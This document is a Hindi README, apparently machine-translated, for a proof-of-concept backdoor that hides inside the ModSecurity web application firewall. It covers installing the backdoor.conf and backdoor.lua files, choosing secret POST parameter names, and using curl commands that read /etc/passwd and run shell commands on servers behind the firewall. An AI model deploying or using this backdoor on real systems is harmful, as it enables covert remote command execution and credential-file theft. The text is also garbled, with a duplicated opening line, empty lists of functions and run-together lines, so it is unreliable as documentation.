
यह ModSecurity WAF के अंदर चलने वाले दुर्भावनापूर्ण सॉफ़्टवेयर का एक प्रूफ-ऑफ-कॉन्सेप्ट है।
यह ModSecurity WAF के अंदर चलने वाले दुर्भावनापूर्ण सॉफ़्टवेयर का एक proof-of-concept है।
सॉफ़्टवेयर के दो मुख्य कार्य हैं:
इसके अतिरिक्त, इसमें ये कार्य शामिल हैं:
SecStreamOutBodyInspection और SecContentInjection को On पर सेट किया गया होbackdoor.conf और backdoor.lua फ़ाइलें प्राप्त करें और पहली फ़ाइल को वेब सर्वर पर लोड करें।
विन्यास backdoor.conf फ़ाइल के पहले नियम में किया जा सकता है।
इस सेटिंग का उपयोग फ़ाइलों की सामग्री प्राप्त करने के लिए उपयोग किए जाने वाले POST तर्क का नाम सेट करने के लिए किया जा सकता है। इसे कुछ भी यादृच्छिक सेट करें जैसे koomem6Shmog।
इस सेटिंग का उपयोग कमांड चलाने के लिए उपयोग किए जाने वाले POST तर्क का नाम सेट करने के लिए किया जा सकता है। इसे कुछ भी यादृच्छिक सेट करें जैसे tys4Olhuibves।
कमांड लक्ष्य सर्वर पर किसी भी पते (डोमेन) पर चलाए जा सकते हैं जो ModSecurity WAF के पीछे है। कमांड का आउटपुट मानक सर्वर प्रतिक्रिया में जोड़ा जाता है।
फ़ाइल सामग्री प्राप्त करना:
curl -X POST -d "koomem6Shmog=/etc/passwd" "http://example.com/"
कमांड चलाना और आउटपुट प्राप्त करना:
curl -X POST -d "tys4Olhuibves=/bin/ps aux" "http://example.com/"
कॉपीराइट (c) 2022 Jozef Sudolsky. सर्वाधिकार सुरक्षित।
"THE BEER-WARE LICENSE" (Revision 42): [email protected] wrote this file. As long as you retain this notice you can do whatever you want with this stuff. If we meet some day, and you think this stuff is worth it, you can buy me a beer in return. Jozef Sudolsky